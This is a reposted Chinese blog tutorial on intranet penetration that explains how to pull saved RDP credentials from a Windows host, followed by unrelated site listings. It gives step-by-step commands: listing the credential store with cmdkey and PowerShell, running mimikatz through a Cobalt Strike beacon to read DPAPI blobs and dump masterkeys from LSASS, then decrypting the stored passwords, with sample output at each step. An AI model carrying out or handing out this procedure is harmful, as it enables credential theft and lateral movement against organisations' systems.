0

0

内网渗透 | 获取远程主机保存的RDP凭据密码

蓮花仙者

蓮花仙者

发布时间:2025-09-02 08:40:31

|

1049人浏览过

|

来源于php中文网

原创

简要记录获取远程主机rdp凭据的方法。

Windows保存RDP凭据的目录为:

C:\Users\用户名\AppData\Local\Microsoft\Credentials

可以通过命令行获取,执行以下命令:

cmdkey /list或powerpick Get-ChildItem C:\Users\rasta_mouse\AppData\Local\Microsoft\Credentials\ -Force

注意:

cmdkey /list
命令必须在Session会话下执行,在system下执行不会有结果。

内网渗透 | 获取远程主机保存的RDP凭据密码

使用Cobalt Strike中的Mimikatz可以获取部分所需的masterkey和pbData:

mimikatz dpapi::cred /in:C:\Users\USERNAME\AppData\Local\Microsoft\Credentials\SESSIONID

输出应类似于:

**BLOB**  dwVersion : 00000001 - 1  guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}  dwMasterKeyVersion : 00000001 - 1  guidMasterKey : {0785cf41-0f53-4be7-bc8b-6cb33b4bb102}  dwFlags : 20000000 - 536870912 (system ; )  dwDescriptionLen : 00000012 - 18  szDescription : 本地凭据数据  algCrypt : 00006610 - 26128 (CALG_AES_256)  dwAlgCryptLen : 00000100 - 256  dwSaltLen : 00000020 - 32  pbSalt : 726d845b8a4eba29875****10659ec2d5e210a48f  dwHmacKeyLen : 00000000 - 0  pbHmackKey :  algHash : 0000800e - 32782 (CALG_SHA_512)  dwAlgHashLen : 00000200 - 512  dwHmac2KeyLen : 00000020 - 32  pbHmack2Key : cda4760ed3fb1c7874****28973f5b5b403fe31f233  dwDataLen : 000000c0 - 192  pbData : d268f81c64a3867cd7e96d99578295ea55a47fcaad5f7dd6678989117fc565906cc5a8bfd37137171302b34611ba5****e0b94ae399f9883cf80050f0972693d72b35a9a90918a06d  dwSignLen : 00000040 - 64  pbSign : 63239d3169c99fd82404c0e230****37504cfa332bea4dca0655

需要关注的是

guidMasterKey
pbData
,其中
pbData
是我们要解密的数据,
guidMasterKey
是解密所需的密钥。LSASS已经在其缓存中存有这个key,因此我们可以使用
SeDebugPrivilege
获取。

Nimo.space
Nimo.space

智能画布式AI工作台

下载
beacon> mimikatz !sekurlsa::dpapi

输出应类似于:

mimikatz !sekurlsa::dpapi     [00000001]     * GUID : {0785cf41-0f53-4be7-bc8b-6cb33b4bb102}     * Time : 2020/1/3 8:05:02     * MasterKey : 02b598c2252fa5d8f7fcd***7737644186223f44cb7d958148     * sha1(key) : 3e6dc57a0fe****a902cfaf617b1322     [00000002]     * GUID : {edcb491a-91d7-4d98-a714-8bc60254179f}     * Time : 2020/1/3 8:05:02     * MasterKey : c17a4aa87e9848e9f46c8ca81330***79381103f4137d3d97fe202     * sha1(key) : 5e1b3eb1152d3****6d3d6f90aaeb

然后将凭据保存到本地,执行以下命令:

mimikatz "dpapi::cred /in:C:\Users\USERNAME\Desktop\test\SESSION /masterkey:对应的GUID key"

内网渗透 | 获取远程主机保存的RDP凭据密码

原创作者: Sp4ce

参考来源: Sp4ce's Blog

相关专题

更多
session失效的原因
session失效的原因

session失效的原因有会话超时、会话数量限制、会话完整性检查、服务器重启、浏览器或设备问题等等。详细介绍:1、会话超时:服务器为Session设置了一个默认的超时时间,当用户在一段时间内没有与服务器交互时,Session将自动失效;2、会话数量限制:服务器为每个用户的Session数量设置了一个限制,当用户创建的Session数量超过这个限制时,最新的会覆盖最早的等等。

308

2023.10.17

session失效解决方法
session失效解决方法

session失效通常是由于 session 的生存时间过期或者服务器关闭导致的。其解决办法:1、延长session的生存时间;2、使用持久化存储;3、使用cookie;4、异步更新session;5、使用会话管理中间件。

740

2023.10.18

cookie与session的区别
cookie与session的区别

本专题整合了cookie与session的区别和使用方法等相关内容,阅读专题下面的文章了解更详细的内容。

88

2025.08.19

windows查看端口占用情况
windows查看端口占用情况

Windows端口可以认为是计算机与外界通讯交流的出入口。逻辑意义上的端口一般是指TCP/IP协议中的端口,端口号的范围从0到65535,比如用于浏览网页服务的80端口,用于FTP服务的21端口等等。怎么查看windows端口占用情况呢?php中文网给大家带来了相关的教程以及文章,欢迎大家前来阅读学习。

601

2023.07.26

查看端口占用情况windows
查看端口占用情况windows

端口占用是指与端口关联的软件占用端口而使得其他应用程序无法使用这些端口,端口占用问题是计算机系统编程领域的一个常见问题,端口占用的根本原因可能是操作系统的一些错误,服务器也可能会出现端口占用问题。php中文网给大家带来了相关的教程以及文章,欢迎大家前来学习阅读。

1104

2023.07.27

windows照片无法显示
windows照片无法显示

当我们尝试打开一张图片时,可能会出现一个错误提示,提示说"Windows照片查看器无法显示此图片,因为计算机上的可用内存不足",本专题为大家提供windows照片无法显示相关的文章,帮助大家解决该问题。

792

2023.08.01

windows查看端口被占用的情况
windows查看端口被占用的情况

windows查看端口被占用的情况的方法:1、使用Windows自带的资源监视器;2、使用命令提示符查看端口信息;3、使用任务管理器查看占用端口的进程。本专题为大家提供windows查看端口被占用的情况的相关的文章、下载、课程内容,供大家免费下载体验。

452

2023.08.02

windows无法访问共享电脑
windows无法访问共享电脑

在现代社会中,共享电脑是办公室和家庭的重要组成部分。然而,有时我们可能会遇到Windows无法访问共享电脑的问题。这个问题可能会导致数据无法共享,影响工作和生活的正常进行。php中文网给大家带来了相关的教程以及文章,欢迎大家前来阅读学习。

2349

2023.08.08

PS使用蒙版相关教程
PS使用蒙版相关教程

本专题整合了ps使用蒙版相关教程,阅读专题下面的文章了解更多详细内容。

23

2026.01.19

热门下载

更多
网站特效
/
网站源码
/
网站素材
/
前端模板

精品课程

更多
相关推荐
/
热门推荐
/
最新课程
PostgreSQL 教程
PostgreSQL 教程

共48课时 | 7.4万人学习

Excel 教程
Excel 教程

共162课时 | 12.5万人学习

PHP基础入门课程
PHP基础入门课程

共33课时 | 2万人学习

关于我们 免责申明 举报中心 意见反馈 讲师合作 广告合作 最新更新
php中文网:公益在线php培训,帮助PHP学习者快速成长!
关注服务号 技术交流群
PHP中文网订阅号
每天精选资源文章推送

Copyright 2014-2026 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号